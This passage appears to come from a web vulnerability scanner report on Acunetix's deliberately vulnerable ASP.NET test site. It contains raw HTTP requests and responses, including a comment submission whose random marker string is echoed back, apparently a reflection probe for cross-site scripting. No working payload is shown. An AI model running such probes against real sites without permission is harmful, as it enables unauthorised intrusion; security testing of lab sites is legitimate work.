href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 593 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:07 GMT Content-Length: 14360
Response Body - size: 14,360 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKm2I3mCQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJ0OOIIRYqVtGT38Je7OHUSHamD9" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 4:42:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" 